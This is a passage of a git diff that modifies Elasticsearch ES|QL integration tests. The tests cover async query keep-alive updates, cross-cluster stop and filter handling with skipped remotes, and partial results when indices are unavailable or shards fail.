org.elasticsearch.ResourceNotFoundException; +import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.support.master.AcknowledgedResponse; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.compute.operator.DriverTaskRunner; import org.elasticsearch.compute.operator.exchange.ExchangeService; import org.elasticsearch.core.TimeValue; import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.tasks.CancellableTask; import org.elasticsearch.tasks.TaskCancelledException; import org.elasticsearch.tasks.TaskInfo; +import org.elasticsearch.transport.TransportService; import org.elasticsearch.xpack.core.LocalStateCompositeXPackPlugin; +import org.elasticsearch.xpack.core.XPackPlugin; +import org.elasticsearch.xpack.core.async.AsyncExecutionId; +import org.elasticsearch.xpack.core.async.AsyncTaskIndexService; import org.elasticsearch.xpack.core.async.DeleteAsyncResultRequest; import org.elasticsearch.xpack.core.async.GetAsyncResultRequest; import org.elasticsearch.xpack.core.async.TransportDeleteAsyncResultAction; @@ -40,6 +46,7 @@ import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; +import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.not; import static org.hamcrest.Matchers.notNullValue; @@ -260,6 +267,90 @@ private void testFinishingBeforeTimeout(boolean keepOnCompletion) { } } + public void testUpdateKeepAlive() throws Exception { + long nowInMillis = System.currentTimeMillis(); + TimeValue keepAlive = timeValueSeconds(between(30, 60)); + var request = EsqlQueryRequestBuilder.newAsyncEsqlQueryRequestBuilder(client()) + .query("from test | stats sum(pause_me)") + .pragmas(queryPragmas()) + .waitForCompletionTimeout(TimeValue.timeValueMillis(between(1, 10))) + .keepOnCompletion(randomBoolean()) + .keepAlive(keepAlive); + final String asyncId; + long currentExpiration; + try { + try (EsqlQueryResponse initialResponse = request.execute().actionGet(60, TimeUnit.SECONDS)) { + assertThat(initialResponse.isRunning(), is(true)); + assertTrue(initialResponse.asyncExecutionId().isPresent()); + asyncId = initialResponse.asyncExecutionId().get(); + } + currentExpiration = getExpirationFromTask(asyncId); + assertThat(currentExpiration, greaterThanOrEqualTo(nowInMillis + keepAlive.getMillis())); + // update the expiration while the task is still running + int iters = iterations(1, 5); + for (int i = 0; i < iters; i++) { + long extraKeepAlive = randomIntBetween(30, 60); + keepAlive = TimeValue.timeValueSeconds(keepAlive.seconds() + extraKeepAlive); + GetAsyncResultRequest getRequest = new GetAsyncResultRequest(asyncId).setKeepAlive(keepAlive); + try (var resp = client().execute(EsqlAsyncGetResultAction.INSTANCE, getRequest).actionGet()) { + assertThat(resp.asyncExecutionId(), isPresent()); + assertThat(resp.asyncExecutionId().get(), equalTo(asyncId)); + assertTrue(resp.isRunning()); + } + long updatedExpiration = getExpirationFromTask(asyncId); + assertThat(updatedExpiration, greaterThanOrEqualTo(currentExpiration + extraKeepAlive)); + assertThat(updatedExpiration, greaterThanOrEqualTo(nowInMillis + keepAlive.getMillis())); + currentExpiration = updatedExpiration; + } + } finally { + scriptPermits.release(numberOfDocs()); + } + // allow the query to complete, then update the expiration with the result is being stored in the async index + assertBusy(() -> { + GetAsyncResultRequest getRequest = new GetAsyncResultRequest(asyncId); + try (var resp = client().execute(EsqlAsyncGetResultAction.INSTANCE, getRequest).actionGet()) { + assertThat(resp.isRunning(), is(false)); + } + }); + // update the keepAlive after the query has completed + int iters = between(1, 5); + for (int i = 0; i < iters; i++) { + long extraKeepAlive = randomIntBetween(30, 60); + keepAlive = TimeValue.timeValueSeconds(keepAlive.seconds() + extraKeepAlive); + GetAsyncResultRequest getRequest = new GetAsyncResultRequest(asyncId).setKeepAlive(keepAlive); + try (var resp = client().execute(EsqlAsyncGetResultAction.INSTANCE, getRequest).actionGet()) { + assertThat(resp.isRunning(), is(false)); + } + long updatedExpiration = getExpirationFromDoc(asyncId); + assertThat(updatedExpiration, greaterThanOrEqualTo(currentExpiration + extraKeepAlive)); + assertThat(updatedExpiration, greaterThanOrEqualTo(nowInMillis + keepAlive.getMillis())); + currentExpiration = updatedExpiration; + } + } + + private static long getExpirationFromTask(String asyncId) { + List tasks = new ArrayList<>(); + for (TransportService ts : internalCluster().getInstances(TransportService.class)) { + for (CancellableTask task : ts.getTaskManager().getCancellableTasks().values()) { + if (task instanceof EsqlQueryTask queryTask) { + EsqlQueryResponse result = queryTask.getCurrentResult(); + if (result.isAsync() && result.asyncExecutionId().get().equals(asyncId)) { + tasks.add(queryTask); + } + } + } + } + assertThat(tasks, hasSize(1)); + return tasks.getFirst().getExpirationTimeMillis(); + } + + private static long getExpirationFromDoc(String asyncId) { + String docId = AsyncExecutionId.decode(asyncId).getDocId(); + GetResponse doc = client().prepareGet().setIndex(XPackPlugin.ASYNC_RESULTS_INDEX).setId(docId).get(); + assertTrue(doc.isExists()); + return ((Number) doc.getSource().get(AsyncTaskIndexService.EXPIRATION_TIME_FIELD)).longValue(); + } + private List getEsqlQueryTasks() throws Exception { List foundTasks = new ArrayList<>(); assertBusy(() -> { diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterAsyncQueryStopIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterAsyncQueryStopIT.java index 37e6b0bb48404..b91b365cf996b 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterAsyncQueryStopIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterAsyncQueryStopIT.java @@ -9,11 +9,15 @@ import org.elasticsearch.Build; import org.elasticsearch.action.ActionFuture; +import org.elasticsearch.client.internal.Client; import org.elasticsearch.core.Tuple; import org.elasticsearch.logging.LogManager; import org.elasticsearch.logging.Logger; import org.elasticsearch.tasks.TaskInfo; +import org.elasticsearch.transport.TransportService; import org.elasticsearch.xpack.core.async.AsyncStopRequest; +import org.elasticsearch.xpack.esql.plugin.EsqlPlugin; +import org.elasticsearch.xpack.esql.plugin.QueryPragmas; import java.util.Iterator; import java.util.List; @@ -125,27 +129,39 @@ public void testStopQuery() throws Exception { } public void testStopQueryLocal() throws Exception { + assumeTrue("Pragma does not work in release builds", Build.current().isSnapshot()); Map testClusterInfo = setupClusters(3); int remote1NumShards = (Integer) testClusterInfo.get("remote1.num_shards"); int remote2NumShards = (Integer) testClusterInfo.get("remote2.num_shards"); populateRuntimeIndex(LOCAL_CLUSTER, "pause", INDEX_WITH_BLOCKING_MAPPING); + // Gets random node client but ensure it's the same node for all operations + Client client = cluster(LOCAL_CLUSTER).client(); + Tuple includeCCSMetadata = randomIncludeCCSMetadata(); boolean responseExpectMeta = includeCCSMetadata.v2(); - - final String asyncExecutionId = startAsyncQuery( - client(), + // By default, ES|QL uses all workers in the esql_worker threadpool to execute drivers on data nodes. + // If a node is both data and coordinator, and all drivers are blocked by the allowEmitting latch, + // there are no workers left to execute the final driver or fetch pages from remote clusters. + // This can prevent remote clusters from being marked as successful on the coordinator, even if they + // have completed. To avoid this, we reserve at least one worker for the final driver and page fetching. + // A single worker is enough, as these two tasks can be paused and yielded. + var threadpool = cluster(LOCAL_CLUSTER).getInstance(TransportService.class).getThreadPool(); + int maxEsqlWorkers = threadpool.info(EsqlPlugin.ESQL_WORKER_THREAD_POOL_NAME).getMax(); + LOGGER.info("--> Launching async query"); + final String asyncExecutionId = startAsyncQueryWithPragmas( + client, "FROM blocking,*:logs-* | STATS total=sum(coalesce(const,v)) | LIMIT 1", - includeCCSMetadata.v1() + includeCCSMetadata.v1(), + Map.of(QueryPragmas.TASK_CONCURRENCY.getKey(), between(1, maxEsqlWorkers - 1)) ); - try { // wait until we know that the local query against 'blocking' has started assertTrue(SimplePauseFieldPlugin.startEmitting.await(30, TimeUnit.SECONDS)); // wait until the remotes are done - waitForCluster(client(), REMOTE_CLUSTER_1, asyncExecutionId); - waitForCluster(client(), REMOTE_CLUSTER_2, asyncExecutionId); + waitForCluster(client, REMOTE_CLUSTER_1, asyncExecutionId); + waitForCluster(client, REMOTE_CLUSTER_2, asyncExecutionId); /* at this point: * the query against remotes should be finished @@ -154,10 +170,10 @@ public void testStopQueryLocal() throws Exception { // run the stop query AsyncStopRequest stopRequest = new AsyncStopRequest(asyncExecutionId); LOGGER.info("Launching stop for {}", asyncExecutionId); - ActionFuture stopAction = client().execute(EsqlAsyncStopAction.INSTANCE, stopRequest); + ActionFuture stopAction = client.execute(EsqlAsyncStopAction.INSTANCE, stopRequest); // ensure stop operation is running assertBusy(() -> { - try (EsqlQueryResponse asyncResponse = getAsyncResponse(client(), asyncExecutionId)) { + try (EsqlQueryResponse asyncResponse = getAsyncResponse(client, asyncExecutionId)) { EsqlExecutionInfo executionInfo = asyncResponse.getExecutionInfo(); LOGGER.info("Waiting for stop operation to start, current status: {}", executionInfo); assertNotNull(executionInfo); @@ -201,7 +217,7 @@ public void testStopQueryLocal() throws Exception { } } finally { SimplePauseFieldPlugin.allowEmitting.countDown(); - assertAcked(deleteAsyncId(client(), asyncExecutionId)); + assertAcked(deleteAsyncId(client, asyncExecutionId)); } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithFiltersIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithFiltersIT.java index 91f1cc12851dc..9f057621aabf7 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithFiltersIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithFiltersIT.java @@ -62,8 +62,10 @@ protected void assertClusterMetadata(EsqlExecutionInfo.Cluster clusterMetatata, protected void assertClusterMetadataSuccess(EsqlExecutionInfo.Cluster clusterMetatata, int shards, long took, String indexExpression) { assertClusterMetadata(clusterMetatata, took, indexExpression, Status.SUCCESSFUL); assertThat(clusterMetatata.getTotalShards(), equalTo(shards)); - assertThat(clusterMetatata.getSuccessfulShards(), equalTo(shards)); - assertThat(clusterMetatata.getSkippedShards(), equalTo(0)); + // We should have at least one successful shard for data + assertThat(clusterMetatata.getSuccessfulShards(), greaterThanOrEqualTo(1)); + // Some shards may be skipped, but total sum of the shards should match up + assertThat(clusterMetatata.getSkippedShards() + clusterMetatata.getSuccessfulShards(), equalTo(shards)); } protected void assertClusterMetadataNoShards(EsqlExecutionInfo.Cluster clusterMetatata, long took, String indexExpression) { @@ -81,7 +83,7 @@ protected void assertClusterMetadataSkippedShards( ) { assertClusterMetadata(clusterMetatata, took, indexExpression, Status.SUCCESSFUL); assertThat(clusterMetatata.getTotalShards(), equalTo(shards)); - assertThat(clusterMetatata.getSuccessfulShards(), equalTo(shards)); + assertThat(clusterMetatata.getSuccessfulShards(), equalTo(0)); assertThat(clusterMetatata.getSkippedShards(), equalTo(shards)); } @@ -313,13 +315,13 @@ public void testFilterWithMissingRemoteIndex() { new RangeQueryBuilder("@timestamp").from("2025-01-01").to("now") )) { count++; - // Local index missing + // Remote index missing VerificationException e = expectThrows( VerificationException.class, () -> runQuery("from cluster-a:missing", randomBoolean(), filter).close() ); assertThat(e.getDetailedMessage(), containsString("Unknown index [cluster-a:missing]")); - // Local index missing + wildcards + // Remote index missing + wildcards // FIXME: planner does not catch this now, it should be VerificationException but for now it's runtime RemoteException var ie = expectThrows( RemoteException.class, @@ -352,6 +354,66 @@ public void testFilterWithMissingRemoteIndex() { } } + public void testFilterWithMissingRemoteIndexSkipUnavailable() { + int docsTest1 = 50; + int docsTest2 = 30; + int localShards = randomIntBetween(1, 5); + int remoteShards = randomIntBetween(1, 5); + populateDateIndex(LOCAL_CLUSTER, LOCAL_INDEX, localShards, docsTest1, "2024-11-26"); + populateDateIndex(REMOTE_CLUSTER_1, REMOTE_INDEX, remoteShards, docsTest2, "2023-11-26"); + setSkipUnavailable(REMOTE_CLUSTER_1, true); + + int count = 0; + for (var filter : List.of( + new RangeQueryBuilder("@timestamp").from("2023-01-01").to("now"), + new RangeQueryBuilder("@timestamp").from("2024-01-01").to("now"), + new RangeQueryBuilder("@timestamp").from("2025-01-01").to("now") + )) { + count++; + try (EsqlQueryResponse resp = runQuery("from cluster-a:missing,logs-1", randomBoolean(), filter)) { + List> values = getValuesList(resp); + assertThat(values, hasSize(count > 2 ? 0 : docsTest1)); + EsqlExecutionInfo executionInfo = resp.getExecutionInfo(); + assertNotNull(executionInfo); + assertThat(executionInfo.isCrossClusterSearch(), is(true)); + long overallTookMillis = executionInfo.overallTook().millis(); + assertThat(overallTookMillis, greaterThanOrEqualTo(0L)); + + EsqlExecutionInfo.Cluster remoteCluster = executionInfo.getCluster(REMOTE_CLUSTER_1); + assertClusterMetadataSkipped(remoteCluster, overallTookMillis, "missing"); + assertThat(remoteCluster.getFailures(), hasSize(1)); + var fail = remoteCluster.getFailures().get(0); + assertThat(fail.getCause().getMessage(), containsString("Unknown index [cluster-a:missing]")); + } + + try (EsqlQueryResponse resp = runQuery("from cluster-a:missing,cluster-a:logs-*", randomBoolean(), filter)) { + List> values = getValuesList(resp); + assertThat(values, hasSize(0)); + EsqlExecutionInfo executionInfo = resp.getExecutionInfo(); + assertNotNull(executionInfo); + assertThat(executionInfo.isCrossClusterSearch(), is(true)); + long overallTookMillis = executionInfo.overallTook().millis(); + assertThat(overallTookMillis, greaterThanOrEqualTo(0L)); + + EsqlExecutionInfo.Cluster remoteCluster = executionInfo.getCluster(REMOTE_CLUSTER_1); + assertClusterMetadataSkipped(remoteCluster, overallTookMillis, "missing,logs-*"); + assertThat(remoteCluster.getFailures(), hasSize(1)); + var fail = remoteCluster.getFailures().get(0); + assertThat(fail.getCause().getMessage(), containsString("no such index [missing]")); + } + // TODO: for now, these fail, but in the future may be skipped instead + // Remote index missing + VerificationException e = expectThrows( + VerificationException.class, + () -> runQuery("from cluster-a:missing", randomBoolean(), filter).close() + ); + assertThat(e.getDetailedMessage(), containsString("Unknown index [cluster-a:missing]")); + // Wildcard index missing + e = expectThrows(VerificationException.class, () -> runQuery("from cluster-a:missing*", randomBoolean(), filter).close()); + assertThat(e.getDetailedMessage(), containsString("Unknown index [cluster-a:missing*]")); + } + } + private void checkRemoteFailures() { for (var filter : List.of( new RangeQueryBuilder("@timestamp").from("2024-01-01").to("now"), diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithPartialResultsIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithPartialResultsIT.java index 62d5904b58b86..46a06f44fecfa 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithPartialResultsIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithPartialResultsIT.java @@ -10,6 +10,7 @@ import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.action.search.ShardSearchFailure; +import org.elasticsearch.action.support.ActiveShardCount; import org.elasticsearch.client.internal.Client; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.breaker.CircuitBreakingException; @@ -41,11 +42,13 @@ import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.in; import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.lessThanOrEqualTo; import static org.hamcrest.Matchers.not; +import static org.hamcrest.Matchers.oneOf; public class CrossClusterQueryWithPartialResultsIT extends AbstractCrossClusterTestCase { @@ -62,12 +65,15 @@ private static class ClusterSetup { void populateIndices() throws Exception { local.okIds = populateIndex(LOCAL_CLUSTER, "ok-local", local.okShards, between(1, 100)); populateIndexWithFailingFields(LOCAL_CLUSTER, "fail-local", local.failingShards); + createUnavailableIndex(LOCAL_CLUSTER, "unavailable-local"); remote1.okIds = populateIndex(REMOTE_CLUSTER_1, "ok-cluster1", remote1.okShards, between(1, 100)); populateIndexWithFailingFields(REMOTE_CLUSTER_1, "fail-cluster1", remote1.failingShards); + createUnavailableIndex(REMOTE_CLUSTER_1, "unavailable-cluster1"); remote2.okIds = populateIndex(REMOTE_CLUSTER_2, "ok-cluster2", remote2.okShards, between(1, 100)); populateIndexWithFailingFields(REMOTE_CLUSTER_2, "fail-cluster2", remote2.failingShards); + createUnavailableIndex(REMOTE_CLUSTER_2, "unavailable-cluster2"); } private void assertClusterPartial(EsqlQueryResponse resp, String clusterAlias, ClusterSetup cluster) { @@ -290,7 +296,11 @@ public void testFailToStartRequestOnRemoteCluster() throws Exception { assertThat(returnedIds, equalTo(local.okIds)); assertClusterSuccess(resp, LOCAL_CLUSTER, local.okShards); EsqlExecutionInfo.Cluster remoteInfo = resp.getExecutionInfo().getCluster(REMOTE_CLUSTER_1); - assertThat(remoteInfo.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); + // It could also return partial on failure + assertThat( + remoteInfo.getStatus(), + oneOf(EsqlExecutionInfo.Cluster.Status.SKIPPED, EsqlExecutionInfo.Cluster.Status.PARTIAL) + ); assertClusterFailure(resp, REMOTE_CLUSTER_1, simulatedFailure.getMessage()); } } finally { @@ -356,6 +366,42 @@ private static Exception randomFailure() { ); } + public void testResolutionFailures() throws Exception { + populateIndices(); + EsqlQueryRequest request = new EsqlQueryRequest(); + request.allowPartialResults(true); + request.query("FROM ok*,unavailable* | LIMIT 1000"); + try (var resp = runQuery(request)) { + assertThat(EsqlTestUtils.getValuesList(resp), hasSize(local.okIds.size())); + assertTrue(resp.isPartial()); + EsqlExecutionInfo executionInfo = resp.getExecutionInfo(); + var localCluster = executionInfo.getCluster(LOCAL_CLUSTER); + assertThat(localCluster.getFailures(), not(empty())); + assertThat(localCluster.getFailures().get(0).reason(), containsString("index [unavailable-local] has no active shard copy")); + } + request.query("FROM *:ok*,unavailable* | LIMIT 1000"); + try (var resp = runQuery(request)) { + assertThat(EsqlTestUtils.getValuesList(resp), hasSize(remote1.okIds.size() + remote2.okIds.size())); + assertTrue(resp.isPartial()); + var executionInfo = resp.getExecutionInfo(); + var localCluster = executionInfo.getCluster(LOCAL_CLUSTER); + assertThat(localCluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); + assertThat(localCluster.getFailures(), not(empty())); + assertThat(localCluster.getFailures().get(0).reason(), containsString("index [unavailable-local] has no active shard copy")); + assertThat(executionInfo.getCluster(REMOTE_CLUSTER_1).getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SUCCESSFUL)); + assertThat(executionInfo.getCluster(REMOTE_CLUSTER_2).getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SUCCESSFUL)); + } + request.query("FROM ok*,cluster-a:unavailable* | LIMIT 1000"); + try (var resp = runQuery(request)) { + assertThat(EsqlTestUtils.getValuesList(resp), hasSize(local.okIds.size())); + assertTrue(resp.isPartial()); + var remote1 = resp.getExecutionInfo().getCluster(REMOTE_CLUSTER_1); + assertThat(remote1.getFailures(), not(empty())); + assertThat(remote1.getFailures().get(0).reason(), containsString("index [unavailable-cluster1] has no active shard copy")); + assertThat(resp.getExecutionInfo().getCluster(LOCAL_CLUSTER).getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SUCCESSFUL)); + } + } + private Set populateIndexWithFailingFields(String clusterAlias, String indexName, int numShards) throws IOException { Client client = client(clusterAlias); XContentBuilder mapping = JsonXContent.contentBuilder().startObject(); @@ -398,4 +444,15 @@ private Set populateIndexWithFailingFields(String clusterAlias, String i } return ids; } + + private void createUnavailableIndex(String clusterAlias, String indexName) throws IOException { + Client client = client(clusterAlias); + assertAcked( + client.admin() + .indices() + .prepareCreate(indexName) + .setSettings(Settings.builder().put("index.routing.allocation.include._name", "no_such_node")) + .setWaitForActiveShards(ActiveShardCount.NONE) + ); + } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EnrichIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EnrichIT.java index 3c37f0ffbcc1d..446c287be64fc 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EnrichIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EnrichIT.java @@ -50,7 +50,6 @@ import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.enrich.EnrichLookupService; import org.elasticsearch.xpack.esql.plan.logical.Enrich; -import org.elasticsearch.xpack.esql.plugin.EsqlPlugin; import org.junit.After; import org.junit.Before; @@ -81,8 +80,8 @@ public class EnrichIT extends AbstractEsqlIntegTestCase { @Override protected Collection> nodePlugins() { - List> plugins = new ArrayList<>(super.nodePlugins()); - plugins.add(EsqlPlugin.class); + List> plugins = new ArrayList<>(); + plugins.add(EsqlActionBreakerIT.EsqlTestPluginWithMockBlockFactory.class); plugins.add(InternalExchangePlugin.class); plugins.add(LocalStateEnrich.class); plugins.add(IngestCommonPlugin.class); diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionIT.java index 488c90f77d3e4..1c409a6b47820 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionIT.java @@ -38,6 +38,7 @@ import org.elasticsearch.index.IndexSettings; import org.elasticsearch.index.mapper.DateFieldMapper; import org.elasticsearch.index.mapper.extras.MapperExtrasPlugin; +import org.elasticsearch.index.query.BoolQueryBuilder; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.index.query.RangeQueryBuilder; import org.elasticsearch.index.shard.IndexShard; @@ -147,6 +148,13 @@ public void testRow() { } } + public void testRowWithFilter() { + long value = randomLongBetween(0, Long.MAX_VALUE); + try (EsqlQueryResponse response = run(syncEsqlQueryRequest().query("row " + value).filter(new BoolQueryBuilder().boost(1.0f)))) { + assertEquals(List.of(List.of(value)), getValuesList(response)); + } + } + public void testFromStatsGroupingAvgWithSort() { testFromStatsGroupingAvgImpl("from test | stats avg(count) by data | sort data | limit 2", "data", "avg(count)"); } @@ -1680,6 +1688,7 @@ public void testQueryOnEmptyDataIndex() { } public void testGroupingStatsOnMissingFields() { + assumeTrue("Pragmas are only allowed in snapshots", Build.current().isSnapshot()); assertAcked(client().admin().indices().prepareCreate("missing_field_index").setMapping("data", "type=long")); long oneValue = between(1, 1000); indexDoc("missing_field_index", "1", "data", oneValue); diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionTaskIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionTaskIT.java index e98574926e586..efefde8871546 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionTaskIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlActionTaskIT.java @@ -19,7 +19,7 @@ import org.elasticsearch.common.util.CollectionUtils; import org.elasticsearch.common.util.concurrent.AbstractRunnable; import org.elasticsearch.compute.lucene.LuceneSourceOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; import org.elasticsearch.compute.operator.DriverStatus; import org.elasticsearch.compute.operator.DriverTaskRunner; import org.elasticsearch.compute.operator.OperatorStatus; @@ -129,12 +129,13 @@ public void testTaskContents() throws Exception { } if (o.operator().equals("ValuesSourceReaderOperator[fields = [pause_me]]")) { assertThat(description, equalTo("data")); - ValuesSourceReaderOperator.Status oStatus = (ValuesSourceReaderOperator.Status) o.status(); + ValuesSourceReaderOperatorStatus oStatus = (ValuesSourceReaderOperatorStatus) o.status(); assertMap( oStatus.readersBuilt(), matchesMap().entry("pause_me:column_at_a_time:ScriptLongs", greaterThanOrEqualTo(1)) ); - assertThat(oStatus.pagesProcessed(), greaterThanOrEqualTo(1)); + assertThat(oStatus.pagesReceived(), greaterThanOrEqualTo(1)); + assertThat(oStatus.pagesEmitted(), greaterThanOrEqualTo(1)); assertThat(oStatus.valuesLoaded(), greaterThanOrEqualTo(1L)); valuesSourceReaders++; continue; diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlNodeFailureIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlNodeFailureIT.java index 30b05f741ec82..7da333e12f7e6 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlNodeFailureIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/EsqlNodeFailureIT.java @@ -19,6 +19,7 @@ import org.elasticsearch.xcontent.json.JsonXContent; import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.plugin.EsqlPlugin; +import org.elasticsearch.xpack.esql.plugin.QueryPragmas; import java.util.ArrayList; import java.util.Collection; @@ -30,6 +31,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.in; import static org.hamcrest.Matchers.lessThanOrEqualTo; import static org.hamcrest.Matchers.not; @@ -98,38 +100,30 @@ public void testFailureLoadingFields() throws Exception { public void testPartialResults() throws Exception { Set okIds = populateIndices(); - { - EsqlQueryRequest request = new EsqlQueryRequest(); - request.query("FROM fail,ok | LIMIT 100"); - request.allowPartialResults(true); - request.pragmas(randomPragmas()); - try (EsqlQueryResponse resp = run(request)) { - assertTrue(resp.isPartial()); - List> rows = EsqlTestUtils.getValuesList(resp); - assertThat(rows.size(), lessThanOrEqualTo(okIds.size())); - } - } - { - EsqlQueryRequest request = new EsqlQueryRequest(); - request.query("FROM fail,ok METADATA _id | KEEP _id, fail_me | LIMIT 100"); - request.allowPartialResults(true); - request.pragmas(randomPragmas()); - try (EsqlQueryResponse resp = run(request)) { - assertTrue(resp.isPartial()); - List> rows = EsqlTestUtils.getValuesList(resp); - assertThat(rows.size(), lessThanOrEqualTo(okIds.size())); - Set actualIds = new HashSet<>(); - for (List row : rows) { - assertThat(row.size(), equalTo(2)); - String id = (String) row.getFirst(); - assertThat(id, in(okIds)); - assertTrue(actualIds.add(id)); - } - EsqlExecutionInfo.Cluster localInfo = resp.getExecutionInfo().getCluster(RemoteClusterService.LOCAL_CLUSTER_GROUP_KEY); - assertThat(localInfo.getFailures(), not(empty())); - assertThat(localInfo.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.PARTIAL)); - assertThat(localInfo.getFailures().get(0).reason(), containsString("Accessing failing field")); + EsqlQueryRequest request = new EsqlQueryRequest(); + request.query("FROM fail,ok METADATA _id | KEEP _id, fail_me | LIMIT 100"); + request.allowPartialResults(true); + // have to run one shard at a time to avoid failing all shards + QueryPragmas pragma = new QueryPragmas( + Settings.builder().put(randomPragmas().getSettings()).put(QueryPragmas.MAX_CONCURRENT_SHARDS_PER_NODE.getKey(), 1).build() + ); + request.pragmas(pragma); + request.acceptedPragmaRisks(true); + try (EsqlQueryResponse resp = run(request)) { + assertTrue(resp.isPartial()); + List> rows = EsqlTestUtils.getValuesList(resp); + assertThat(rows.size(), equalTo(okIds.size())); + Set actualIds = new HashSet<>(); + for (List row : rows) { + assertThat(row.size(), equalTo(2)); + String id = (String) row.getFirst(); + assertThat(id, in(okIds)); + assertTrue(actualIds.add(id)); } + EsqlExecutionInfo.Cluster localInfo = resp.getExecutionInfo().getCluster(RemoteClusterService.LOCAL_CLUSTER_GROUP_KEY); + assertThat(localInfo.getFailures(), not(empty())); + assertThat(localInfo.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.PARTIAL)); + assertThat(localInfo.getFailures().get(0).reason(), containsString("Accessing failing field")); } } @@ -147,6 +141,15 @@ public void testDefaultPartialResults() throws Exception { EsqlQueryRequest request = new EsqlQueryRequest(); request.query("FROM fail,ok | LIMIT 100"); request.pragmas(randomPragmas()); + // have to run one shard at a time to avoid failing all shards + QueryPragmas pragma = new QueryPragmas( + Settings.builder() + .put(randomPragmas().getSettings()) + .put(QueryPragmas.MAX_CONCURRENT_SHARDS_PER_NODE.getKey(), 1) + .build() + ); + request.pragmas(pragma); + request.acceptedPragmaRisks(true); if (randomBoolean()) { request.allowPartialResults(true); } @@ -154,6 +157,7 @@ public void testDefaultPartialResults() throws Exception { assertTrue(resp.isPartial()); List> rows = EsqlTestUtils.getValuesList(resp); assertThat(rows.size(), lessThanOrEqualTo(okIds.size())); + assertThat(rows.size(), greaterThan(0)); } } // allow_partial_results = false diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupFromIndexIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupFromIndexIT.java index 1355ffba796a8..e25cb82f29851 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupFromIndexIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/LookupFromIndexIT.java @@ 